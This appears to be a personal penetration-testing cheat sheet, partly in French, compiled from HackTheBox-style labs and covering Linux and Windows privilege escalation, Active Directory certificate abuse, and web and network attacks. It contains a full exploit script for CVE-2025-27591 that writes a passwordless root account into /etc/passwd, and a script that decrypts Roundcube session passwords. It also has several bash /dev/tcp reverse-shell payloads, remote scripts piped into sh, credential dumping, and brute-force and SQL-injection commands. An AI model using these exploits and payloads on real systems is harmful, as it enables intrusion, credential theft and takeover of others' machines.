によって Swinowz . 2日前.
864
Cybermap
によって Swinowz . 2日前.
864
Config File :
/var/www/html/roundcube/config/config.inc.php
Get info from sql :
mysql -u roundcube -p USE roundcube; SELECT sess_id, vars FROM session;
Python script :
from base64 import b64decode
from Crypto.Cipher import DES3
import sys
# Encrypted password (base64 from session)
enc = "L7Rv00A8TuwJAr67kITxxcSgnIk25Am/"
key = b"rcmail-!24ByteDESkey*Str" # from config.inc.php
# Decode base64
raw = b64decode(enc)
iv = raw[:8]
ciphertext = raw[8:]
cipher = DES3.new(key, DES3.MODE_CBC, iv)
decrypted = cipher.decrypt(ciphertext)
# Remove padding (PKCS#7)
pad_len = decrypted[-1]
plaintext = decrypted[:-pad_len].decode('utf-8')
print(f"[+] Decrypted password: {plaintext}")
Roundcube 1.5.x < 1.5.10
Roundcube 1.6.x < 1.6.11
CVE-2025-49113 (authenticated) :
php CVE-2025-49113.php URL user pass 'bash -c "bash -i >& /dev/tcp/ip/port 0>&1"'
CVE-2025-27591
#!/usr/bin/env python3
import os
import subprocess
import sys
import pty
BINARY = "/usr/bin/below"
LOG_DIR = "/var/log/below"
TARGET_LOG = f"{LOG_DIR}/error_root.log"
TMP_PAYLOAD = "/tmp/attacker"
MALICIOUS_PASSWD_LINE = "attacker::0:0:attacker:/root:/bin/bash\n"
def check_world_writable(path):
st = os.stat(path)
return bool(st.st_mode & 0o002)
def is_symlink(path):
return os.path.islink(path)
def run_cmd(cmd, show_output=True):
if show_output:
print(f"[+] Running: {cmd}")
try:
return subprocess.check_output(cmd, shell=True, stderr=subprocess.STDOUT, text=True)
except subprocess.CalledProcessError as e:
if show_output:
print(f"[-] Command failed: {e.output}")
return None
def check_vulnerability():
print("[*] Checking for CVE-2025-27591 vulnerability...")
if not os.path.exists(LOG_DIR):
print(f"[-] Log directory {LOG_DIR} does not exist.")
return False
if not check_world_writable(LOG_DIR):
print(f"[-] {LOG_DIR} is not world-writable.")
return False
print(f"[+] {LOG_DIR} is world-writable.")
if os.path.exists(TARGET_LOG):
if is_symlink(TARGET_LOG):
print(f"[+] {TARGET_LOG} is already a symlink. Looks exploitable.")
return True
else:
print(f"[!] {TARGET_LOG} is a regular file. Removing it...")
os.remove(TARGET_LOG)
try:
os.symlink("/etc/passwd", TARGET_LOG)
print(f"[+] Symlink created: {TARGET_LOG} -> /etc/passwd")
os.remove(TARGET_LOG)
return True
except Exception as e:
print(f"[-] Failed to create symlink: {e}")
return False
def exploit():
print("[*] Starting exploitation...")
with open(TMP_PAYLOAD, "w") as f:
f.write(MALICIOUS_PASSWD_LINE)
print(f"[+] Wrote malicious passwd line to {TMP_PAYLOAD}")
if os.path.exists(TARGET_LOG):
os.remove(TARGET_LOG)
os.symlink("/etc/passwd", TARGET_LOG)
print(f"[+] Symlink set: {TARGET_LOG} -> /etc/passwd")
print("[*] Executing 'below record' as root to trigger logging...")
try:
subprocess.run(["sudo", BINARY, "record"], timeout=40)
print("[+] 'below record' executed.")
except subprocess.TimeoutExpired:
print("[-] 'below record' timed out (may still have written to the file).")
except Exception as e:
print(f"[-] Failed to execute 'below': {e}")
print("[*] Appending payload into /etc/passwd via symlink...")
try:
with open(TARGET_LOG, "a") as f:
f.write(MALICIOUS_PASSWD_LINE)
print("[+] Payload appended successfully.")
except Exception as e:
print(f"[-] Failed to append payload: {e}")
print("[*] Attempting to switch to root shell via 'su attacker'...")
try:
pty.spawn(["su", "attacker"])
except Exception as e:
print(f"[-] Failed to spawn shell: {e}")
return False
def main():
if not check_vulnerability():
print("[-] Target does not appear vulnerable.")
sys.exit(1)
print("[+] Target is vulnerable.")
if not exploit():
print("[-] Exploitation failed.")
sys.exit(1)
if __name__ == "__main__":
main()
Exported data maybe ?
~/.config/Slack
Config file
wp-config.php
Reverse
Upload a plugin, edit an existing one etc
<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/ip/port 0>&1'") ?>
Rev
Config files
installPath/xwiki/WEB-INF/hibernate.cfg.xml
Find potential sensible files
https://github.com/bitquark/shortscan
go install github.com/bitquark/shortscan/cmd/shortscan@latest
shortscan http://10.13.38.11
jj
Made using a variety of hackthebox machines
Pro labs done and integrated into the mindmap :
DANTE
Ping sweep
1..254 | % { if (Test-Connection -Count 1 -Quiet 172.16.2.$_) { "172.16.2.$_ is up" } }
for /L %i in (1,1,254) do @ping -n 1 -w 35 172.16.2.%i | find "Reply"
for i in {1..254}; do ping -c1 -W1 172.16.2.$i &>/dev/null && echo "172.16.2.$i is up"; done
./chisel server --reverse --port 9999
9999 is the port used to talk to your hostchisel client 10.10.11.64:9999 R:8080:127.0.0.1:8080
R: = reverse port forward (we want to access a victim's port)127.0.0.1:8080 = local port on the victim8080 = exposed port on the hostFor example, using the above you'll be able to access the following link which was supposed to be accessible only on the victim's machine :
http://localhost:8080/login/
Ne pas oublier, même si on trouve un chemin, continuer les commandes et noter les trouvailles importantes pour revenir sur celles-ci une par une !
Interesting files
/home/* /opt /srv /var/mail /var/www /var/backup /var/log /etc/passwd /etc/shadow
Interesting files
find / -type f \( -iname "*.db" -o -iname "*.sqlite" -o -iname "*.db3" \) 2>/dev/null
find / -type f \( -iname ".env" -o -iname ".git*" -o -iname "*config*" -o -iname "*secret*" -o -iname "*credential*" -o -iname "*.bak" -o -iname "*.old" -o -iname "*.swp" -o -iname "*history*" -o -iname "*id_rsa*" -o -iname "*.pem" -o -iname "*.key" -o -iname "*.sqlite*" -o -iname "*.db" -o -iname "*.yml" -o -iname "*.json" \) -not -path "/proc/*" -not -path "/sys/*" -not -path "/dev/*" -not -path "/usr/*" -not -path "/lib/*" -not -path "/boot/*" -not -path "/var/log/*" -not -path "/snap/*" -not -path "/run/*" 2>/dev/null
Manual enum
whoami && id && hostname && uname -a && groups && env sudo -l (L !) ps aux ps -ef
Check low hanging fruits
Des exploits classiques mais rarement exploitable
https://github.com/liamg/traitor/releases/download/v0.0.14/traitor-386
./traitor-386
Check running recurrent processes
Start the tool "pspy" for a few minutes to see if anything interesting pops up
docker available ? > Annex : Docker escape
Crontab
crontab -l ls -la /etc/cron* /var/spool/cron/
Capabilities / suid etc
http[s]://gtfobins.github.io/
getcap -r / 2>/dev/null find / -perm -4000 -type f 2>/dev/null
Network
ss -tulnp netstat -antup
For pivoting in the network, remember to scan ips on the same network ( in the context of a pro lab for example ) using ping sweep ( check Cybermap to see the commands )
Use lazagne to get hashes, hidden passwords etc
./lazagne.exe
Here are some commands to
try when not given any data
SMB users & shares
nxc smb <ip> -u '' -p '' nxc smb <ip> -u '' -p ''
Global enum
enum4linux-ng.py -a -u '' -p '' <ip> ldapsearch -x -H <ip> -s base
Find users based on a list
kerbrute userenum -d <domain> <userlist>
Bruteforce
nxc smb -u user -p passFile
ASREPROASTING
GetNPUsers.py -dc-ip ip domain -usersfile userFile -format hashcat
Deleted objects
Files
Find files
(New-Object -ComObject Shell.Application).Namespace(0xA).Items() | ForEach-Object { "$($_.Name) - $($_.Path)" }
Restore file
Copy-Item 'C:\$RECYCLE.BIN\S-1-5-21-2386970044-1145388522-2932701813-1103\$RE2XMEG.7z' -Destination 'C:\Users\f.frizzle\Desktop\\wapt-backup-sunday.7z'
Users
List - via LDAPsearch
ldapsearch -H ldap://10.10.11.72 -D 'user' -w 'password' -b "CN=Deleted Objects,DC=CHANGEME,DC=CHANGEME" -E '!1.2.840.113556.1.4.417' "(objectClass=user)" msDS-LastKnownRDN distinguishedName whenChanged
List - via powershell
Get-ADObject -Filter 'ObjectClass -eq "user"' -IncludeDeletedObjects -Properties * | Where-Object { $_.IsDeleted -eq $true } | Select-Object Name, DistinguishedName, ObjectSID
Restore
Restore-ADObject -Identity "*" * = replace with the full DN ( CN=, DC=) that you got from the list cmd
Services enum
Check a service's ACLs
Upload the following tool on the victim's machine
https://github.com/swinowz/scripts/blob/main/windows/Get-ServiceACL.ps1
powershell.exe -ExecutionPolicy Bypass -File .\Get-ServiceACL.ps1 -Name "serviceName"
Service control (sc.exe) commands
Get a service's config
sc.exe qc "Name"
Start & Stop a service
sc.exe start/stop "Name"
Change a service's config
Set-Service -Name ServiceName -DisplayName "Test" OR sc.exe config ServiceName binPath= "C:\path"
Privileges
GetChangesAll exploit
permits dumping hashes for AD accounts
secretsdump.py 'user:pass@ip' evil-winrm -u 'Administrator' -H 'hash' -i ip
G
Tools
ldapsearch
List Users & descriptions
ldapsearch -H ldap://IP -D "domain\\user" -w 'password' -b "dc=domain,dc=local" "(objectClass=user)" cn sAMAccountName description
Bloodhound/ .py
Start data gathering
python3 ../BloodHound.py/bloodhound.py -d DOMAIN -dc DOMAIN -ns IP --zip -c All -u "USER" -p "PASSWORD"
DACLedit
List ACEs
dacledit.py domain/"user":'password' -dc-ip ip -target username -principal-sid S-1-5-10
Certipy (>5.0 !)
Install certipy-ad using pipx
Mindmap made under certipy 5.0.2
Using python 3.12>
ESC
Wiki link with all ESCs exploitation methods
https://github.com/ly4k/Certipy/wiki/06-%E2%80%90-Privilege-Escalation#
ESC16
Read attributes :
certipy account -u 'controlledUser@domain' -p 'password' -dc-ip ip -user 'targerUser' read
Change UPN → administrator
certipy account -u 'controlledUser@domain' -p 'password' -dc-ip ip -upn 'administrator' -user 'targetUser' update
Get the ccache + cert req with it
certipy shadow -u 'controlledUser@Domain' -p 'password' -dc-ip 'ip' -account 'targetAccount' auto export KRB5CCNAME=*.ccache certipy req -k -dc-ip 'ip' -target 'dc01.xxx.htb' -ca 'xx-DC01-CA' -template 'User'
Reset the UPN
certipy account -u 'controlledUser@domain' -p 'password' -dc-ip ip -upn 'initialUPN' -user 'targetUser' update
Authenticate using the cert
certipy auth -dc-ip 'ip' -pfx 'administrator.pfx' -username 'administrator' -domain 'domain'
Final auth
evil-winrm -u administrator -H hash -i ip tree /a /f
ESC15
Prerequirements :
Schema version : 1 ENROLLEE_SUPPLIES_SUBJECT : TRUE
C:\Windows\System32\certutil.exe
certipy req -u 'controlledUser@domain' -p 'password' -dc-ip 'DC_IP' -target 'CA_HOST' -ca 'CA_NAME' -template 'EnrollmentAgentTemplate' -application-policies 'Certificate Request Agent'
certipy req -u 'controlledUser@domain' -p 'password' -dc-ip 'DC_IP' -target 'CA_HOST' -ca 'CA_NAME' -template 'User' -on-behalf-of 'DOMAIN\\TargetUser' -pfx 'controlledUser.pfx'
certipy auth -pfx 'TargetUser.pfx' -dc-ip 'DC_IP'
KESBEROASTABLE
KESBEROASTABLE
certipy shadow auto -u 'user@domain' -p 'password' -account 'targetUser' -dc-ip 'ip'
FIND
Get vulnerable certs + check potential ESCs vulns
certipy find -u targetUser@domain -hashes :targetNTLMHash -target domain -dc-host dcHost.domain -dc-ip targetIP -vulnerable -stdout
Eternal Blue
Windows server 2012 R2 + SMB v1
msf admin/smb/ms17_010_command
To get a reverse shell, use powershell encoded payload
https://www.revshells.com/
Do not use pwncat-cs with windows, use rlwrap
rlwrap -cAr nc -lvnp PORT
rdesktop 192.18.1.21 -u username -p password
whoami /all net localgroup -group- net user /domain tree /a /F ( ! in C:\Users ! )
Misc
If you're in a enterprise-type lab or something like that, remember to start a ping sweep to see if the pwned machine has any other accessible networks
Sync your time&date with the server in order to perform multiple kerberos attacks
First method :
sudo rdate -r IP
Second method :
sudo ntpdate IP
If it doesnt work :
sudo systemctl stop systemd-timesyncd sudo systemctl disable systemd-timesyncd
To reset the time :
sudo ntpdate -r pool.ntp.org
Things i'm keeping whendoing htb, thm, ptd etc boxes
Get a file from remote
scp user@ip:/remotepath localPath
Send a file to remote
scp FileToSend user@ip:remotePath
Using priv key
scp -i SSHkeyFile "user@ip:remotePath" localPath
Force password auth flags
scp -o PreferredAuthentications=password -o PubkeyAuthentication=no "user@ip:remotePath" localPath
powershell -Command "Invoke-WebRequest -Uri 'http://ip:port/mimikatz.exe' -OutFile 'mimikatz.exe'"
Invoke-WebRequest -Uri http://10.10.14.10:7777/file -OutFile out
python3 -m http.server port
Basic network analysis
On windows
ipconfig /all route print arp -a netstat -ano type C:\WINDOWS\System32\drivers\etc\hosts ipconfig /displaydns | findstr "Record" | findstr "Name Host"
On linux
ip addr ip -br a ip r
Ping sweep
PowerShell :
1..254 | % { if (Test-Connection -Count 1 -Quiet 192.168.0.$_) { "192.168.0.$_ is up" } }
Windows CMD:
for /L %i in (1,1,254) do @ping -n 1 -w 35 192.168.0.%i | find "Reply"
Linux (bash/sh):
for i in {1..254}; do ping -c1 -W1 192.168.0.$i &>/dev/null && echo "192.168.0.$i is up"; done
sshuttle te donne accès à tout le réseau routable par la cible, sauf :127.0.0.1 (loopback local de la victime)iptables ou firewalld sur la victimetcp 127.0.0.1:8080 → ❌ inaccessible via sshuttle tcp 0.0.0.0:80 → ✅ accessible via sshuttle tcp 192.168.1.100:22 (autre machine interne) → ✅ accessible via sshuttle
Donc sshuttle = VPN vers réseau
Mais pas un accès aux services uniquement en localhost sur la machine SSH elle-même.
sshuttle -r username@sshserver 0.0.0.0/0
Sans accès SSH -- chisel
Sur la victime (10.10.11.64), upload chisel et lance :
./chisel server --reverse --port 9999
9999 est le port utilisé pour communiquer avec ton hôtechisel client 10.10.11.64:9999 R:8080:127.0.0.1:8080
R: = reverse port forward (on veut accéder à un port local de la victime).127.0.0.1:8080 = port local à la victime.8080 = port exposé sur ton hôte local.Sur l'exemple dessus, on peux apres sur l'host se connecter via
http://localhost:8080/login/
Avec un accès SSH
ssh -L 8080:127.0.0.1:8080 tobias@10.10.11.64
Le premier port = local
Le deuxième = distant
ssh -fNL xxx = en background
Find readable text
Change {6,} for min lenght req
strings file| grep -E "[A-Za-z0-9]{6,}"
Context search, search around a text
grep -A 5 -B 5 "StringToFind" file
Find readable text
Change {6,} for min lenght req
grep -E "[A-Za-z0-9]{6,}" file
---------------------------------------------------------------------------------------
Stringcheese
Use stringcheese from Mathis Hammel as a base for rev challenges or things like that, it just tries a lot of operation to find a match
stringcheese --file file CTF{
Generate file with numbers
seq 1000 -1 1 > countdown
Make a list of text + numbers at the end ( ex password1, password2 etc )
seq 1 10 | sed 's/^/Password/'
List a file's content wiithout lines which starts with "#"
sed '/^#/d' FILE
Connect using private key
ssh -i id_rsa user@ip
Send password directly
sshpass -p "password" ssh user@ip
Flags to force password auth
PreferredAuthentications=password -o PubkeyAuthentication=no
User enum
pip install smtp-user-enum smtp-user-enum -U /usr/share/wordlists/metasploit/unix_users.txt 10.150.150.17 25
Bruteforce
hydra -l operator -P wordlist.txt ipip smtp
Lister les shares
smbclient -L //ip/ -U 'user%password'
Se connecter avec le client sur un share spécifique
smbclient //ip/share -U 'user%password'
Télécharger tout les fichiers
On se connecte au share puis dans le client
PROMPT off mget *
Get all files
prompt OFF mget *
rpcinfo IP
sudo umount 10.150.150.59:/nfsroot
sudo mount -t nfs ip:/remote /local
showmount -e IP
Connect
mysql -h localhost -u sql_user -p
Dump sql db
mysqldump -u root -p --all-databases > alldb.sql
Restart in safe mode to bypass auth
sudo mysqld_safe --skip-grant-tables --skip-networking &
sudo mysql
Connect
mssqlclient.py sequel.htb/sa:MSSQLP@ssw0rd!@10.10.11.51
Semi-auto
Setup listener then, EXEC xp_cmdshell 'powershell -encodedcommand <payload>';
NXC
Check if privesc is possible
nxc mssql ip -u user -p pass --local-auth -M mssql_priv
Execute commands
nxc mssql IP -u use -p 'password' --local-auth -x whoami
Automatic
https://www.netexec.wiki/mssql-protocol/mssql-privesc
Hidden deleted file
Download file
Copy-Item 'C:\$RECYCLE.BIN\S-1-5-21-2386970044-1145388522-2932701813-1103\$RE2XMEG.7z' -Destination 'C:\Users\f.frizzle\Desktop\\wapt-backup-sunday.7z'
Find file
(New-Object -ComObject Shell.Application).Namespace(0xA).Items() | ForEach-Object { "$($_.Name) - $($_.Path)" }
tree /a /f
@for /r C:\ %i in (FLAG??.txt) do @echo %i && @type "%i"
Other
grep -r pattern
search in files ( -recursive )
Find
find / -type f -name 'FLAG[0-9][0-9]' 2>/dev/null
find ./* | grep FLAG3
find / \( -name ".env" -o -name ".git" \) 2>/dev/null
find / -type f -name 'FLAG[0-9].txt' 2>/dev/null
Use vim
:set shell=/bin/bash :shell
searchsploit -m xxxxx
Unredactor
Depix
python3 depix.py -p pixel_image -s images/searchimages/image.png
https://piellardj.github.io/stereogram-solver/
steghide extract -sf screen.jpeg
ncat -nv --source-port 53 10.129.2.28 50000
nmap -sS -Pn -n -p- --disable-arp-ping -D RND:3 --source-port 53 ip
nmap -sSU --script dns-nsid ip
script /dev/null -qc /bin/bash
python3 -c 'import pty; pty.spawn("/bin/bash")'
Installation :
git clone https://github.com/longld/peda.git ~/peda echo "source ~/peda/peda.py" >> ~/.gdbinit
Need GDB ( obviously )
List clients connected to an AP
Lists unique destination MACs communicating in data frames
tshark -r FILE -Y "wlan.fc.type == 2" -T fields -e wlan.sa -e wlan.da | grep "MAC" | cut -f2 | sort | uniq
Find beacon frames
Shows AP MAC addresses and advertised SSIDs
tshark -r FILE -Y "wlan.fc.type==0 && wlan.fc.subtype==8" -T fields -e wlan.sa -e wlan.ssid
Find probe requests and decode SSIDs hex
Lists probe request SSIDs, decodes to ASCII, counts occurrences
tshark -r FILE -Y "wlan.fc.type==0 && wlan.fc.subtype==4" -T fields -e wlan.ssid | grep -v "<MISSING>" | sort | uniq -c | awk '{c=$1; $1=""; h=""; for(i=2;i<=NF;i++) h=h $i; gsub(/ /,"",h); cmd="echo " h " | xxd -r -p 2>/dev/null"; cmd | getline d; close(cmd); print h, d, c}' | column -t | sort -k3 -n -r
Identify who's probing the SSIDs found using the cmd above
Shows clients (source MACs) probing specific SSIDs.
tshark -r FILE -Y "wlan.fc.type==0 && wlan.fc.subtype==4" -T fields -e wlan.sa -e wlan.ssid | grep -v "<MISSING>" | grep -E "(SSID1|SSID2|SSID3)"
Management Frames (Type 0):
0 Association Request → Client requests association with AP
1 Association Response → AP responds to association request
2 Reassociation Request → Client requests reassociation to AP
3 Reassociation Response → AP responds to reassociation request
4 Probe Request → Client scans for networks
5 Probe Response → AP replies to probe request
8 Beacon → AP periodically announces network
9 ATIM → Announcement Traffic Indication Message
10 Disassociation → Client/AP ends association
11 Authentication → Client/AP authentication handshake
12 Deauthentication → Client/AP ends authentication
13 Action → Misc management actions
Control Frames (Type 1)
RTS → Request to Send
CTS → Clear to Send
ACK → Acknowledgment
Block ACK → Block acknowledgment
Data Frames (Type 2)
Data → Standard data frame
QoS Data → Data with Quality of Service
Null Function → Empty frame for power save
CF-Ack → Contention-Free acknowledgment
wlan.sa → Source MAC address
wlan.da → Destination MAC address
wlan.ssid → Show SSID
Find DNs (distinguished names)
tshark -r FILE -Y "ldap" -T fields -e ldap.name
Find LDAP creds
tshark -r FILE -Y ldap -T fields -e ldap.name -e ldap.simple
Get HTTP logins
tshark -r FILE -Y "http.request.method == POST" -T fields -e urlencoded-form.key -e urlencoded-form.value
Check protocol hierarchy
tshark -r FILE -q -z io,phs
To output specific fields use :
-T fields -e x -e y
( change x & y by actuel fields value )
Bruteforce Protocole
hydra -l operator -P wordlist.txt 10.150.150.56 <protocole> exi
Bruteforce FTP
hydra -C /usr/share/wordlists/seclist/Passwords/Default-Credentials/ftp-betterdefaultpasslist.txt -t 4 -f -vV ftp://10.129.85.235
Bruteforce SSH
hydra -L users -P passwords -t 24 ssh://ip:port
Formulaire POST
hydra -L users -P passwords 10.150.150.38 -s 30609 http-post-form "/login/index.php:username=^USER^&password=^PASS^&s_mod=login&s_pg=index:F=Username or Password wrong"
---
hydra -L /usr/share/wordlists/unix_users.txt -p "test:test:test" file.era.htb http-post-form \ "/security_login.php:username=^USER^&answer1=test&answer2=test&answer3=test:User not found"
Basic auth
hydra -L users -P /usr/share/wordlists/rockyou.txt http-get://127.0.0.1:8000/ -V -t 64
Paramètres
-s = port
-c = combolist
-f = stop on success
-t = thread
-vV = verbose
Basic enum on a parameter
sqlmap -u "http://xxx/blog/post.php?id=6" -p 'id'
List DBs
sqlmap -u "http://xxx/blog/post.php?id=6" -p 'id' --dbms=mariadb --dbs
List tables from DBs
sqlmap -u "http://xxx/blog/post.php?id=6" -p 'id' --dbms=mariadb -D flag --tables
Misc params
--dbms="" -- specify dbms to skip some tests
-D -- select DB
-T -- select Table
https://github.com/synacktiv/phpfilterchaingenerator/blob/main/phpfilterchaingenerator.py
http://ip/file.php?page=scriptOutput&cmd=bash%20-c%20%27bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2FIP%2FPORT%200%3E%261%27
Change IP and PORT and scriptOutput ( generated from the py script )
http://ip/file.php?page=scriptOutput&cmd=id
wpscan --url url_wordpress --passwords wordlist
wpscan --url url --enumerate u
wpscan --url url --enumerate vp,vt
cewl url > wordlist
Subdomain enumeration
wfuzz -c -t 100 -z file,<wordlist> --sc 200 -H "Host: FUZZ.planning.htb" http://planning.htb/ ffuf -u http://planning.htb/ -w <wordlist> -H "Host: FUZZ.planning.htb" -mc 200 -t 200 -v
Enum
wfuzz -c -z file,wordlist --follow -H "Cookie: PHPSESSID=ah09c3b0431vss4il8gg4ih2fl" --hh 2985 "http://nocturnal.htb/view.php?username=FUZZ&file=.docx"
Paramètres
-z mode de fuzz
--follow pour suivre les redirects
--hh xx => Ignore les réponses de xx caractères
--sc => filtre par codes ( -sc 200 - affiche que les 200 )
--hc => filtre exclusif ( -hc 404,301,etc )
Parameter fuzzing :
ffuf -u "url?id=FUZZ" -w wordlist
More params :
Cookies : -b key=value
Filter size : -fs value
Filter status code : -fc x,y,z
feroxbuster -u http://example.com -w wordlist -x php,html,txt -v -o output.txt --filter-status 404
feroxbuster -u url -w ~/Desktop/SecLists-master/Discovery/Web-Content/common.txt --filter-status 404
Paramètres
-k = certif autosigné
gobuster vhost -u http://planing.htb -w /usr/share/wordlists/seclist/Discovery/DNS/namelist.txt --append-domain -t 200
gobuster dir -u http://planing.htb -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 200 -k -r
Params :
-k : cert ignore
-r : recursive
(ALL, !root) /bin/bash
-1 in this context is interpreted as 4294967295 on 32-bit
-1 is treated as root (UID 0)
sudo -u#-1 /bin/bash
------
------
----
(ALL
-1 in thi
Find which disk is used as root
df -h
for example here /dev/sda5
Then use the following command :
debugfs /dev/sda5
When launched, we can execute some commands using debugfs
https://book.hacktricks.xyz/linux-hardening/privilege-escalation/interesting-groups-linux-pe/lxd-privilege-escalation
find / -perm -u=s -type f 2>/dev/null
ln -s /root /home/michael/importantfiles/rootbackup
searchsploit -m chemin
searchsploit xxxx
curl -L https://github.com/peass-ng/PEASS-ng/releases/latest/download/linpeas.sh | sh
